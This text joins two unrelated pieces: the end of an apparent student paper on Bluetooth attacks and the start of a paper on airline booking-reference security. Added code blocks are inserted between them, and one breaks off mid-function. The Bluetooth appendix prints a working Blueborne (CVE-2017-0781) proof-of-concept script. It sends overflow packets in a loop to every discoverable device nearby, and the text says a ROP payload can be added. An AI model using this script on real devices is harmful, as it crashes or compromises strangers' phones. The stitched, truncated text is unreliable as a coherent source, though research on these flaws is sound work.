The Adafruit Bluetooth Low Energy Sniffer is capable of passively capturing data exchanges between two Bluetooth Low Energy devices, and pushing that data into Wireshark. It also adds useful descriptors to avoid having to examine the long Bluetooth spec. The device only works for Bluetooth LE, not for other implementations of Bluetooth [22].

4.1.2 Ubertooth One
Ubertooth One is an open source 2.4 GHz wireless development platform for Bluetooth experimentation [23]. It has the following features [24]:

1. 2.4 GHz transmit and receive.
2. Transmit power and receive sensitivity comparable to a Class 1 Bluetooth device.
3. Standard Cortex Debug Connector (10-pin 50-mil JTAG).
4. In-System Programming (ISP) serial connector.
5. Expansion connector: intended for inter-Ubertooth communication or other future uses.
6. Six indicator LEDs.

4.1.3 Nordic Semiconductor nRF51 DK
The nRF51 DK is “a low-cost, versatile single-board development kit for Bluetooth® low energy, ANT and 2.4GHz proprietary applications [which is] compatible with the Arduino Uno Revision 3 standard, making it possible to use 3rd-party shields that are compatible to this standard with the kit” [25].

4.1.4 Ellisys Bluetooth Explorer
The Ellisys Bluetooth Explorer is “Industry’s First and Only All-In-One Wideband BR/EDR and Low Energy sniffer with concurrent capture of Wi-Fi, 2.4 GHz spectrum, HCI, WCI-2, logic signals, and Audio I2S” [26].

4.2 Software
4.2.1 Bluez

Figure 2: l2ping performed on various BDADDRs in Kali Linux

The basic tools included in Bluez to manage Bluetooth include hciconfig, hcitool, sdptool, etc. In particular, hcitool allows us to inquire about a device’s details, such as the device MAC address, name and class. sdptool checks for the services provided by the device (e.g. Handsfree Audio, etc). gatttool grabs specific values of a General Attribute, or GATT characteristic as defined in the Bluetooth specification. l2ping (see Figure 2) is a Bluetooth discovery tool which sends pings to devices to see if they are alive.

4.2.2 Wireshark
Wireshark is the world’s foremost and widely-used network protocol analyzer. It also has support for capturing Bluetooth; a set-up guide to do so is available at [27].

4.2.3 Kali Linux
Kali Linux is a Debian-based Linux distribution which contains many tools aimed towards information security tasks. The Linux implementation of the Bluetooth protocol stack is Bluez, which is installed by default in Kali.

Here is a list of tools and their descriptions:

1. bluelog - A Bluetooth site survey tool that scans the area to find as many discoverable devices in the area and then logs them to a file
2. blueranger - A simple Python script that uses l2cap pings to locate Bluetooth devices and determine their approximate distances
3. bluesnarfer - Sends AT commands via RFCOMM to a Bluetooth device that browses the phonebook or make phone calls
4. btscanner - GUI-based tool scans for discoverable devices within range
5. redfang - Locates hidden Bluetooth devices
6. spooftooph - Spoofs Bluetooth MAC addresses

4.2.4 Crackle
Aimed at Bluetooth LE, crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.

With the STK and LTK, all communications between the master and the slave can be decrypted. [28]

5. PROOF OF CONCEPT
In this section, we cover our attempts to attack Bluetooth and our use of available code and various tools to our advantage.

5.1 Carwhisperer v2.0 with Real-Time Audio
Our investigations found there were previous attempts to eavesdrop on Bluetooth headsets back in 2005, named Carwhisperer. [29] It is aimed at manufacturers of carkits and other headless Bluetooth appliances for the possible security threat evolving from the use of standard passkeys. A real-time patch was also released to enable audio output simultaneously. [30, 31]

We used Kali Linux to perform an attack using Carwhisperer. Our target was a Samsung Galaxy S7 and our goal was to record all audio input to the target victim and save it in a .raw output file. The steps are as follows:

1. Ensure the Bluetooth service is up and running.
2. Change the device class to “Phone, Cellular”
3. Scan for Bluetooth devices and note down the Bluetooth address of the target device.
4. Use Carwhisperer to record any audio input to the target device and save it in a .raw file.

However, our attempt ended up with little success as the connection to the RFCOMM channel was refused.

Figure 3: Carwhisperer running on a Bluetooth headset with AT commands being sent

We also performed an attack on a recently purchased Bluetooth headset (see Figure 3) that claims to support Bluetooth v4.1. It works directly with Carwhisperer on RFCOMM channel 1, with its PIN defaulted to ’0000’ (set by the manufacturer), and simply allowed communication. However, the headset unpairs itself from the host device, so we were unable to obtain any exchange of vocal communication between the host and the slave device (headset).

Despite this, the headset continues to communicate with Carwhisperer and reports AT+BRSF and AT+VGM commands at will. These commands are simply modem commands. [32] This should not be the case as the microphone has been compromised and the adversary is still able to perform eavesdropping on the device.

Even so, we are unable to decode the audio as Carwhisperer generates raw files that require processing. The documentation for Carwhisperer explicitly requires the use of the legacy OSS (Open Sound System) as part of SoX (Sound eXchange) parameters.

Thus, we are unable to obtain anything that is concrete from the slave device. All attempts at using different parameters in SoX, and at emulating OSS in ALSA and PulseAudio, have been exhausted and proven unfruitful.

5.2 Raspberry Pi 3
We earlier mentioned the Blueborne exploit [13] and its effectiveness as a zero-day vulnerability. Here we place it in the context of a popular small computing device, the RPi3.

Figure 4: RPi3 running on pi64

The RPi3 has evolved since its predecessors and is powered by the Broadcom BCM2837 SoC, delivering a quad-core ARM Cortex A53 (ARMv8) cluster. The ARM cores run at 1.2GHz, making the device about 50% faster than the Raspberry Pi 2. [33]

Being credit-card-sized, its performance/portability is unmatched and it can be used as a headless or walking hacking device while discreetly being kept away from sight. We have made a prototype which delivers the payload to, or steals information from, victims who have unintentionally left their Bluetooth devices discoverable.

However, the delivery of the Blueborne exploit requires the use of a 64-bit system as pwntools will not compile on 32-bit systems. To overcome this, an experimental 64-bit OS named pi64 is installed on the RPi3.

A Python script (Appendix A), written using the pybluez and pwntools libraries, triggers the heap overflow vulnerability [34, 35] on the Android devices of unsuspecting victims.

The script exploits the code flow that handles incoming BNEP control messages. CVE-2017-0781 abuses the memcpy function call in BNEP_FRAME_CONTROL (a switch case for BNEP control messages), causing a buffer overflow. [2, 35]

In combination with the SDP information disclosure vulnerability (CVE-2017-0785), a complete bypass of the Address Space Layout Randomization (ASLR) mitigation can be achieved as well. Pointers that are leaked from the stack can be used to allow an attacker to learn the base addresses of the various sections of the Bluetooth process, and these can be used by an attacker to elevate one of the heap overflow vulnerabilities to reliable code control. [2, 36, 37]

Although this experiment only leaks unintended information and demonstrates the overflow and the ability to crash the Bluetooth service, it can be elevated to remote code execution.

In addition, the RPi3 is also fully capable of deploying Carwhisperer (see Section 5.1) or GATTack [12].

Through this, the RPi3 serves as a powerful tool which allows easy exploitation of Bluetooth vulnerabilities without the need for a full-sized laptop computer in the outside world.

6. CONCLUSION AND FUTURE WORK
In this paper, we have shown that Bluetooth has fallen victim to various attacks, with evolving tools and techniques used to break into its security protocols.

Based on our findings, we highly recommend that users leave Bluetooth off unless necessary. This does, though, put a burden on users, who shouldn’t have to think about their own security – their devices should take care of it for them. We also recommend that manufacturers allow users’ headsets to use a different pairing code, instead of leaving them discoverable at all times or with a fixed default setting.

This paper has neither highlighted the dangers of, nor performed, exploitation via return-oriented programming (ROP) on Android devices; this could serve as an extension in future work [38].

7. REFERENCES
[1] Bluetooth Core Specification, Bluetooth SIG, Inc, December 2016, v5.0.
[2] B. Seri and G. Vishnepolsky, “Blueborne technical white paper,” Armis Labs, Tech. Rep., 2017.
[3] E. T. S. Institute, “Etsi ts v7.1.0,” 1999. [Online]. Available: http://www.etsi.org/deliver/etsi_ts/101300_101399/101369/07.01.00_60/ts_101369v070100p.pdf
[4] D. Browning and G. C. Kessler, “Bluetooth hacking: A case study,” in Proceedings of the Conference on Digital Forensics, Security and Law. Association of Digital Forensics, Security and Law, 2009, p. 115.
[5] J. Padgette, “Guide to bluetooth security,” NIST Special Publication, vol. 800, p. 121, 2017.
[6] J. Thom-Santelli, A. Ainslie, and G. Gay, “Location, location, location: a study of bluejacking practices,” in CHI’07 extended abstracts on Human factors in computing systems. ACM, 2007, pp. 2693–2698.
[7] A. Laurie, M. Holtmann, and M. Herfurt, “Bluesmack,” 2004. [Online]. Available: https://trifinite.org/trifinite_stuff_bluesmack.html
[8] Wikipedia, “Bluesnarfing — wikipedia, the free encyclopedia,” 2017, [Online; accessed 9-November-2017]. [Online]. Available: https://en.wikipedia.org/w/index.php?title=Bluesnarfing&oldid=791752785
[9] ——, “Bluebugging — wikipedia, the free encyclopedia,” 2017, [Online; accessed 9-November-2017]. [Online]. Available: https://en.wikipedia.org/w/index.php?title=Bluebugging&oldid=801398150
[10] A. Laurie, “Helomoto attack,” AL Digital Ltd. [Online]. Available: https://trifinite.org/trifinite_stuff_helomoto.html
[11] S. Telefonica Digital Espana, “Dirtytooth.” [Online]. Available: http://dirtytooth.com/
[12] S. Jasek, “Gattacking bluetooth smart devices,” SecuRing, Tech. Rep., 2017.
[13] A. Labs, “Blueborne information from the research team.”
[14] K. Haataja, K. Hyppönen, S. Pasanen, and P. Toivanen, Bluetooth Security Attacks: Comparative Analysis, Attacks, and Countermeasures, ser. SpringerBriefs in Computer Science. Springer Berlin Heidelberg, 2013. [Online]. Available: https://books.google.com.sg/books?id=gTNRnwEACAAJ
[15] T. O’Connor, Violent Python: a cookbook for hackers, forensic analysts, penetration testers and security engineers. Newnes, 2012.
[16] T. Baumeister, “Analysis of bluetooth protocol security,” Ph.D. dissertation, University of Wisconsin–La Crosse, 2010.
[17] Y. Lu, W. Meier, and S. Vaudenay, “The conditional correlation attack: A practical attack on bluetooth encryption,” in Crypto, vol. 3621. Springer, 2005, pp. 97–117.
[18] Actxa, “Actxa stride+,” 2016. [Online]. Available: http://actxa.com/sg/stride-plus/
[19] Re4son. (2017) Re4son-kernel for raspberry pi 1/2/3/zero/zero w. [Online]. Available: https://whitedome.com.au/re4son/re4son-kernel
[20] Z. Riggle, “Pwntools does not work on 32-bit ubuntu,” 2015. [Online]. Available: https://github.com/Gallopsled/pwntools/issues/518
[21] B. Amarni, “A 64-bit os for the raspberry pi 3,” 2016. [Online]. Available: https://github.com/bamarni/pi64
[22] Adafruit, “Bluefruit le sniffer,” 2017. [Online]. Available: https://www.adafruit.com/product/2269
[23] G. S. Gadgets, “Ubertooth one,” 2017. [Online]. Available: https://greatscottgadgets.com/ubertoothone/
[24] ——, “Project ubertooth - ubertooth one,” 2017. [Online]. Available: http://ubertooth.sourceforge.net/hardware/one/
[25] N. Semiconductors, “nrf51,” 2017. [Online]. Available: https://www.nordicsemi.com/eng/Products/nRF51-DK
[26] Ellisys, “Ellisys - bluetooth explorer,” 2017. [Online]. Available: https://www.ellisys.com/products/bex400/
[27] T. W. Wiki, “Capturesetup/bluetooth,” 2017. [Online]. Available: https://wiki.wireshark.org/CaptureSetup/Bluetooth
[28] M. Ryan, “Crack and decrypt ble encryption,” https://github.com/mikeryan/crackle, 2016.
[29] M. Herfurt. (2005) Carwhisperer. [Online]. Available: https://trifinite.org/trifinite_stuff_carwhisperer.html
[30] (2011) Bluetooth penetration testing framework. [Online]. Available: http://bluetooth-pentest.narod.ru
[31] B. Ballmann, “bluedivingng - next generation bluetooth security tool,” 2011. [Online]. Available: https://github.com/balle/bluediving
[32] Trolltech. (2009) Modem emulator - control and status. [Online]. Available: https://radekp.github.io/qtmoko/api/modememulator-controlandstatus.html
[33] (2016) Raspberry pi 3 is out now! specs, benchmarks & more. [Online]. Available: https://www.raspberrypi.org/magpi/raspberry-pi-3-specs-benchmarks
[34] K. Ojasoo, “Blueborne cve-2017-0781 android heap overflow vulnerability poc,” 2017. [Online]. Available: https://github.com/ojasookert/CVE-2017-0781
[35] M. Corporation, “Cve-2017-0781,” 2017. [Online]. Available: http://www.cvedetails.com/cve/CVE-2017-0781
[36] ——, “Cve-2017-0785,” 2017. [Online]. Available: http://www.cvedetails.com/cve/CVE-2017-0785
[37] K. Ojasoo, “Blueborne cve-2017-0785 android information leak vulnerability poc,” 2017. [Online]. Available: https://github.com/ojasookert/CVE-2017-0785
[38] L. Davi, A. Dmitrienko, A.-R. Sadeghi, and M. Winandy, “Privilege escalation attacks on android,” in International Conference on Information Security. Springer, 2010, pp. 346–360.
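The BNEP framing that Section 5.2 and the Appendix A script refer to (frame type BNEP_FRAME_CONTROL, the extension bit, the setup connection request) can be checked structurally on the receiving or monitoring side. The following Python 3 validator is an added example, not code from the paper or from any Bluetooth stack; the function names are hypothetical, the field layout is assumed from the BNEP 1.0 specification, and the sample frames are constructed.

```python
import struct

EXT_FLAG = 0x80                  # top bit of byte 0: extension headers follow
BNEP_FRAME_CONTROL = 0x01        # same value as in the Appendix A script
SETUP_CONNECTION_REQUEST = 0x01
VALID_UUID_SIZES = (2, 4, 16)    # assumed from the BNEP specification
# Bytes that follow the control-type byte for fixed-size control messages.
FIXED_BODY = {0x00: 1, 0x02: 2, 0x04: 2, 0x06: 2}
# Control messages carrying a 2-byte big-endian list length plus the list.
LIST_BODY = (0x03, 0x05)


def control_message(buf, off, findings):
    """Check one control message at buf[off:]. Return the offset just past it,
    or None when it cannot be delimited."""
    if off >= len(buf):
        findings.append("control frame truncated: no control type")
        return None
    ctype = buf[off]
    body = off + 1
    if ctype == SETUP_CONNECTION_REQUEST:
        if body >= len(buf):
            findings.append("setup request truncated: no UUID size")
            return None
        size = buf[body]
        if size not in VALID_UUID_SIZES:
            findings.append("setup request UUID size %d not in %r"
                            % (size, VALID_UUID_SIZES))
        end = body + 1 + 2 * size          # destination UUID + source UUID
    elif ctype in FIXED_BODY:
        end = body + FIXED_BODY[ctype]
    elif ctype in LIST_BODY:
        if body + 2 > len(buf):
            findings.append("filter message truncated: no list length")
            return None
        end = body + 2 + struct.unpack_from(">H", buf, body)[0]
    else:
        findings.append("unknown control type 0x%02x" % ctype)
        return None
    if end > len(buf):
        findings.append("control type 0x%02x claims %d bytes, %d available"
                        % (ctype, end - off, len(buf) - off))
        return None
    return end


def inspect_bnep(frame):
    """Return a list of structural problems found in one BNEP frame."""
    findings = []
    if not frame:
        return ["empty frame"]
    has_ext = bool(frame[0] & EXT_FLAG)
    if frame[0] & 0x7F != BNEP_FRAME_CONTROL:
        return findings                    # data frames are out of scope here
    off = control_message(frame, 1, findings)
    if off is None:
        return findings
    while has_ext:                         # walk the extension header chain
        if off + 2 > len(frame):
            findings.append("extension flag set but no extension header follows")
            return findings
        has_ext = bool(frame[off] & EXT_FLAG)
        ext_len = frame[off + 1]
        if off + 2 + ext_len > len(frame):
            findings.append("extension header claims %d bytes, %d available"
                            % (ext_len, len(frame) - off - 2))
            return findings
        off += 2 + ext_len
    if off != len(frame):
        findings.append("%d trailing bytes after the last header"
                        % (len(frame) - off))
    return findings


if __name__ == "__main__":
    # Constructed frames: a setup request with 2-byte UUIDs, and a frame with
    # the shape built by packet() in Appendix A (extension bit, UUID size 0).
    print(inspect_bnep(bytes([0x01, 0x01, 0x02, 0x11, 0x16, 0x11, 0x15])))
    print(inspect_bnep(bytes([0x81, 0x01, 0x00]) + b"AAAABBBB"))
```

A monitor or a receiving stack that applies checks of this kind rejects the frame before any length taken from it is used to size or copy a buffer.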

APPENDIX

A. PROTOTYPE CODE & HARDWARE

The following code is written in Python for the Raspberry Pi 3 and is based on the Blueborne exploit (CVE-2017-0781) for Android devices. [2, 35]

Note that this code does not contain the actual payload, nor does it implement discovery for undiscoverable devices. It can be modified to target undiscoverable devices and injected with an actual payload. However, this mandates the use of a ROP chain to run attacker-specified code and can be performed by using ROPgadget, a tool that searches binaries for gadgets to facilitate ROP exploitation.

To use this script, a 64-bit Unix OS is required, along with the installation of Python 2.7 (packages: pybluez, pwntools) and bluez (packages: bluetooth, libbluetooth-dev, libffi-dev) on the RPi3.

This setup also uses a widely available CSR (Cambridge Silicon Radio) v4.0 Bluetooth dongle.

The code is as follows:

    from pwn import *
    import bluetooth

    count = 30  # Amount of packets to send

    port = 0xf  # BT_PSM_BNEP
    context.arch = 'arm'
    BNEP_FRAME_CONTROL = 0x01
    BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01

    def set_bnep_header_extension_bit(bnep_header_type):
        """
        If the extension flag is equal to 0x1 then
        one or more extension headers follows the BNEP
        header; If extension flag is equal to 0x0 then the
        BNEP payload follows the BNEP header.
        """
        return bnep_header_type | 128

    def bnep_control_packet(control_type, control_packet):
        return p8(control_type) + control_packet

    def packet(overflow):
        pkt = ''
        pkt += p8(set_bnep_header_extension_bit(BNEP_FRAME_CONTROL))
        pkt += bnep_control_packet(BNEP_SETUP_CONNECTION_REQUEST_MSG, '\x00' + overflow)
        return pkt

    bad_packet = packet('AAAABBBB')

    while (1):
        nearby_devices = bluetooth.discover_devices(lookup_names=False)
        log.info('Found %d devices' % len(nearby_devices))

        for addr in nearby_devices:
            target = addr
            log.info('Attempting to inject CVE-2017-0781...')
            log.info('Connecting to {}...'.format(addr))
            sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
            bluetooth.set_l2cap_mtu(sock, 1500)

            try:
                sock.connect((target, port))
            except:
                log.info('Unable to connect...continuing attempt')
                break

            log.info('Sending BNEP packets...')
            for i in range(count):
                sock.send(bad_packet)

            log.success('Success!')
            sock.close()
Evaluation of the Security of Airline Booking Systems

Lu Yuehan
National University of Singapore
13 Computing Drive
Singapore 117417
+65 6516 2727
a0119387@u.nus.edu

Matthieu Marie Emmanuel Buot De L'Epine
National University of Singapore
13 Computing Drive
Singapore 117417
+65 6516 2727
e0216175@u.nus.edu

Tan Xue Si
National University of Singapore
13 Computing Drive
Singapore 117417
+65 6516 2727
xuesi.tan@u.nus.edu

Tay Keming Justin
National University of Singapore
13 Computing Drive
Singapore 117417
+65 6516 2727
justintay@u.nus.edu

Wong Kang Fei
National University of Singapore
13 Computing Drive
Singapore 117417
+65 6516 2727
kfwong@u.nus.edu

ABSTRACT
With the recent growth in demand in the aviation industry, people are entrusting their personal data to airlines, attached to their flight bookings, in exchange for an uninterrupted flight experience. It is vital that these passenger data are kept private and confidential, for only intended recipients to view. This paper seeks to analyse how secure the booking codes used by airlines are, and the measures put in place by airlines on their websites for the retrieval of booking records. The findings are presented with proposed solutions, to allow for more secure systems to be built.

Categories and Subject Descriptors
K.6.5 [Security and Protection]: Miscellaneous

General Terms
Security

Keywords
Airlines, Aviation, Booking systems, GDS, Global Distribution Systems, Amadeus, Sabre, Travelport

1. INTRODUCTION
There has been an increasing trend in passenger growth in the aviation industry in recent years, with passenger demand forecast to double in 20 years and a year-on-year growth of 7.4% in both 2016 and 2017. [1] [2]
This roughly translates to an increase in the number of people who can afford air travel and who, in the process of booking the tickets to their next travel destination, have provided the airlines of their choice with some of their personal data. These personal data include, and are not limited to, information such as the passenger’s name, email address, passport information and the payment method used to pay for their tickets.
This increasing demand has also transformed into a force accelerating changes in the aviation industry, to cope with the increase in demand and, more notably, to give passengers peace of mind while travelling. Most media coverage or noted implementations for air travel safety have been on improvements in general, such as facilitating airport security checks. [4] Other improvements, like flight upgrades, stem from lessons learnt from past incidents in the industry, like the disappearance of Malaysia Airlines flight 370, which has prompted upgrades to flight tracking equipment. [5]
Yet, there has not been much coverage or noted improvements in software or cybersecurity for the aviation industry, which is one of the top priorities as well. [3] This is in view of technical incidents, such as those affecting the check-in systems, or cyber-attacks that have been made on the industry. [6] [7]
One could argue that with technological advancements, the software and related cybersecurity measures put in place by airlines need to be constantly updated and tested to ensure the integrity of their networks and protect consumer data. Yet, there is not as much focus from news or other media outlets on the improvements to such technical systems of airlines, despite the numerous technical glitches that have been experienced. [9]

2. MOTIVATION
With the advent of big data and digital advertising, consumers’
personal data is now pegged with a price tag which is estimated to
be £3,241. [8] Considering this and the personal information that

consumers are passing on to airlines, it is important for these data to be kept private and secure to a certain extent.
Moreover, the earliest airline booking systems go all the way back to the 1960s and are utilized by most, if not all, airlines in generating booking references. [10] Thus, these systems may not provide sufficient security by modern standards to safely protect consumer data.
This paper aims to explore and test the security that airlines have in place for the retrieval of bookings using booking reference codes generated for each booking that a passenger makes.

3. AIRLINE BOOKING
Each booking made by a potential traveller follows a typical process as highlighted in Figure 1 below, until they retrieve a booking reference that is generated for his or her booking:

Figure 1 Ticket booking process

3.1 Booking Systems
Booking systems refer to either travel agents, such as Expedia, or the airline's own website for booking travel tickets. These booking systems interact with the GDS to check fare availability from the different travel providers and create or update reservations as necessary.

3.2 Global Distribution Systems (GDS)
Global Distribution Systems (GDS) were first created in the 1960s, as a means of controlling and overseeing the availability and prices of flights, as well as the flight schedules. [11] Now, these systems store data from both airlines and passengers, as they maintain the fares and availability of tickets from airlines and reservations created by passengers.
There are three main GDS players in the global market currently:

3.2.1 Amadeus
Amadeus was founded by a group of airlines in 1987, namely Air France, Iberia, Lufthansa and Scandinavian Airlines. It is the second main player in the GDS market, with 19.7% of the market share. [12] It has since grown and acquired Navitaire back in 2016, another GDS system which was mainly used by budget carriers. [13]

3.2.2 Sabre
Sabre was the first GDS to be created, developed in 1960 through a collaboration between American Airlines and IBM to handle electronic reservations. [10] It has approximately 36.3% of the global market share with its main clientele in the USA. [12]

3.2.3 Travelport
Travelport is the youngest of the main GDS players, due to the later founding and the acquisition of other smaller rival GDS systems such as Galileo and Worldspan. It currently owns approximately 20% of the market share. [12]

3.3 Travel Providers
Travel providers are organizations utilizing the Global Distribution Systems (GDS) to store data on some sort of service that they offer, and in our case, airlines that provide different fares, seats and availability.

3.4 Passenger Name Records (PNR)
Passenger name records (PNR) are generated by the booking systems for each trip that a passenger books. These PNRs are built using the data provided by the passenger, airline or travel agent when booking his or her travel tickets.
The data encapsulated by a PNR includes details such as the passenger’s name, address, contact number and other travel information. [14] (See Figure 2)

Figure 2 Example of a PNR

These PNRs may include information from different travel providers, such as a car hire included under a travel ticket and some sensitive information such as credit card numbers. As such,

it is important to limit the access to these PNRs and provide
sufficient security measures to protect the information contained.

3.5 Booking Reference


A booking reference code, or PNR locator code, is generated for
each booking that is made. These are typically 6-character
alphanumeric codes, all in uppercase, thus providing a
code space of 36^6 or 2,176,782,336 different combinations.
While there may be slight variations between the different GDS,
the code space is alarmingly small and is susceptible to brute force
attacks.

4. ISSUES
Most airlines these days provide a form for managing bookings,
and while different airlines may have slight differences in the
information required to retrieve a booking, most can still be
retrieved using only the PNR locator or booking reference,
coupled with the passenger’s last name for that booking.
This authentication measure is similar to a password-based
authentication system, except that these ‘passwords’ cannot be
changed by the user and are shared between different parties, such
as the airline, travel agents and GDS staff. This forms a very weak
authentication measure by modern standards.
Besides the susceptibility of brute forcing the PNR locator with an
associated last name, the PNR can be gathered both online or
offline, through various means such as searching through social
media, or capturing baggage tags in the airports.

Figure 3 PNR on boarding pass uploaded on social media

Figure 4 PNR on physical baggage tags

Given the information captured in a PNR, the issue is worsened by the following factors:

4.1 Information Loss

As anyone who can access the PNR is able to retrieve the information associated with it, the original holder of the PNR might face multiple threats, such as being stalked, credit card fraud or even identity theft.

4.2 Flight Theft


Being able to access the manage booking functionality using the
PNR locator and/or some other fields, malicious attackers may be
able to accomplish various tasks. The functionalities available
may differ between airlines, but typically include tasks such as:
[15] [16]
1. Changing of flight details such as date or seats
2. Refunding of ticket or transferring passenger name
3. Collecting flyer miles instead of the original passenger
A malicious attacker may then be able to “convert” the ticket and
allow him/herself to fly for free, leaving the original passenger
stranded without a flight despite having legitimately paid for it.

4.3 Social Engineering


Malicious attackers may be able to utilize various information
gained from accessing the PNR to conduct social engineering
attacks. For instance, spear-phishing may also be used, where a

malicious attacker may create and send phishing emails to its identified target from the PNR to trick its unknowing victim into disclosing other confidential information.

5. TESTING
In view of the issues present, it is important to ensure that booking retrieval systems are sufficiently secure to minimize the probability of occurrence of the incidents highlighted previously.
We first identify the issues that may be present in the booking retrieval systems on current airline websites, before proposing solutions that may help to mitigate unwanted attacks.
For our testing purposes, we have scoped the airlines to those that are more relevant in the context of Singapore, limiting ourselves to a total of 10 different airlines. Our basic analysis comprises 30 valid and 30 invalid requests to trigger the system. Valid requests were done using our relatives' and/or friends’ valid bookings (with permission), while invalid requests were randomly generated values meant to trigger the different measures these sites have in place.
The testing framework involves two types of tests, visual and non-visual tests. The results are presented in a tabular format in their respective subsections.

5.1 Visual Testing
Under the visual testing aspects, we have identified 5 different factors which can be easily identified while using the websites, namely:

1. Captchas
The presence of captchas serves to hinder brute force attempts on the site, by requesting the user to solve a puzzle after multiple requests or if the request is deemed to be suspicious.

2. IP Bans
IP bans can be used as a supplementary measure to deter brute force attacks and hinder potential attackers, by banning the IP used when the number of invalid requests served exceeds a certain threshold.

3. Leakage of information from error messages
Leaking information through error messages may provide additional insights to a potential attacker, such as the inner workings of the system or confirming part of the input from the attacker.

Figure 5 Example of error message leaking information

In this example, we can see that the error message enabled us to gain an insight that the PNR we requested was valid, except that the passenger name does not match.

Figure 6 Example of normal error message

4. Ability to check on bookings made with other airlines
Being able to check on bookings made with other airlines poses an additional vulnerability or loophole for attackers to utilize, as they can bypass additional safeguards set in place by other sites and use one with lower security standards to conduct their attacks.

Figure 7 Example of checking booking on another airline

5. Site is HTTPS enabled
HTTPS should be enabled by default, to protect a user’s privacy and data integrity against intruders that exploit unprotected resources.

Table 1 Visual testing results
Airline | Captcha | IP Bans | Error message leaks info | Ability to check on other airline bookings | HTTPS enabled
AirAsia | ✕ | ✕ | ✕ | ✕ | ✓
Cathay Pacific | ✕ | ✕ | ✓ | ✕ | ✓
JetStar | ✕ | ✕ | ✓ | ✓ | ✓
Korean Air | ✕ | ✕ | ✕ | ✕ | ✓
Malaysia Airlines | ✕ | ✕ | ✓ | ✓ | ✓
Qantas | ✕ | ✕ | ✓ | ✓ | ✓
Scoot | ✕ | ✕ | ✕ | ✕ | ✓
SilkAir | ✕ | ✕ | ✕ | ✕ | ✓
Singapore Airlines | ✕ | ✕ | ✕ | ✕ | ✓
Thai Airways | ✕ | ✕ | ✕ | ✕ | ✓

From our visual testing results, we can see that most airline sites have similar defence mechanisms, aside from JetStar, Malaysia Airlines and Qantas having weaker defences. However, a notable factor would be the lack of captchas and IP bans on these sites despite multiple requests that would be more than necessary to deem them as suspicious.

5.2 Non-Visual Testing
Non-visual testing relates to underlying processes and additional functional attributes, which may require additional inputs, such as checking on the vulnerability to SQL injection, rate throttling and code obfuscation.

1. Rate throttling
The use of rate throttling limits the number of requests served to a certain IP address, and may help to mitigate excess load caused by malicious attackers.

2. Loading times on valid vs. invalid inputs
The difference in loading time between valid and invalid inputs may provide an insight into the inner workings of the system, such as additional work being processed on the backend, which may in turn be used by malicious attackers to conduct a denial-of-service attack.

3. Code obfuscation
Code obfuscation relates to altering of function and variable names in code on the web pages, such as renaming all JavaScript functions. However, this does not include the minifying of code.

4. Local input testing
Local input testing refers to the transference of hashed data from the remote server for local processing to reduce bandwidth consumption. For instance, when a valid booking reference but incorrect last name is requested, the server provides a hashed version of the other inputs to be verified against locally.

5. SQL injection
This tests the SQL injection vulnerability of the website, which may enable additional data to be stolen by a malicious attacker if such a vulnerability is present. This is an assumption to test if any of the commands are executed against a SQL database on the backend.

Table 2 Non-visual testing results
Airline | Throttling | Loading times on valid vs. invalid inputs | Code obfuscation | Local input tests | SQL Injection
AirAsia | ✕ | - | ✕ | ✕ | ✕
Cathay Pacific | ✕ | 400ms | ✓ | ✕ | ✕
JetStar | ✕ | 200ms | ✓ | ✕ | ✕
Korean Air | ✕ | - | ✓ | ✕ | ✕
Malaysia Airlines | ✕ | 2000ms | ✕ | ✕ | ✕
Qantas | ✕ | 2000ms | ✓ | ✕ | ✕
Scoot | ✕ | - | ✕ | ✕ | ✕
SilkAir | ✕ | - | ✓ | ✕ | ✕
Singapore Airlines | ✕ | - | ✓ | ✕ | ✕
Thai Airways | ✕ | - | ✕ | ✕ | ✕

From the non-visual test results, a direct relation can be drawn from the weaker sites identified in the visual test section. From the combined results, we can classify these sites into different groups depending on their overall defence mechanisms, which are provided below:

Rank | Airlines
High | AirAsia, Korean Air, SilkAir, Singapore Airlines
Medium | Cathay Pacific, Scoot, Thai Airways
Low | JetStar, Malaysia Airlines, Qantas

6. SOLUTIONS
After analysing the various sites, we would like to propose the following implementations as a means of complementing the current security measures to better protect a booking retrieval system.

6.1 Visual Aspects


6.1.1 Captchas
Despite 30 different attempts on the different sites, we did not
encounter any captcha requests. Even though it could be argued
that the captchas may be triggered only on higher attempt counts,
such as after 1000 invalid requests, it would be rendered useless if
the attacker bombards the site using multiple device instances. It
is also impractical to allow a huge number of invalid requests as a
typical user would not be trying that many different combinations.
We feel that a probable threshold for the captcha trigger should be
after about 10 invalid requests.
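
The following added example (not the paper's own code) sketches a per-client gate that combines the captcha threshold proposed above with the incremental bans and per-request delay the paper proposes in Sections 6.1.3 and 6.2.3. The class and function names, the one-hour expiry of the counter, the reading of the delay as 2 seconds multiplied by the number of invalid accesses, and the sample client address are assumptions made for the illustration.

```python
from dataclasses import dataclass

CAPTCHA_AFTER = 10        # invalid requests before a captcha is demanded (Section 6.1.1)
MAX_TRIES = 30            # invalid requests before the client is banned (Section 6.2.3)
DELAY_PER_ACCESS = 2.0    # seconds; delay = 2 s x invalid accesses (assumed reading)
BAN_STEPS = (5 * 60, 30 * 60, 24 * 3600, None)  # 5 min, 30 min, 1 day, permanent (6.1.3)
FORGET_AFTER = 3600.0     # assumption: the invalid count expires after an idle hour


@dataclass
class ClientState:
    invalid: int = 0            # invalid requests counted since the last ban
    last_invalid: float = 0.0   # time of the most recent invalid request
    bans: int = 0               # bans already served; selects the next ban step
    banned_until: float = 0.0   # float("inf") marks a permanent ban


class RetrievalGuard:
    """Per-client gate in front of a booking-retrieval form (hypothetical class)."""

    def __init__(self):
        self.clients = {}

    def _state(self, client_id, now):
        st = self.clients.setdefault(client_id, ClientState())
        # A user who mistyped a few times is forgiven after an idle period.
        if st.invalid and now - st.last_invalid > FORGET_AFTER:
            st.invalid = 0
        return st

    def check(self, client_id, now):
        """Return (action, delay_seconds) to apply before serving the request."""
        st = self._state(client_id, now)
        if now < st.banned_until:
            return ("banned", 0.0)
        delay = DELAY_PER_ACCESS * st.invalid
        action = "captcha" if st.invalid >= CAPTCHA_AFTER else "allow"
        return (action, delay)

    def record(self, client_id, now, valid):
        """Update the client's counters once the lookup result is known."""
        st = self._state(client_id, now)
        if valid:
            # Not reset on success: one genuine booking must not clear the count.
            return
        st.invalid += 1
        st.last_invalid = now
        if st.invalid >= MAX_TRIES:
            step = BAN_STEPS[min(st.bans, len(BAN_STEPS) - 1)]
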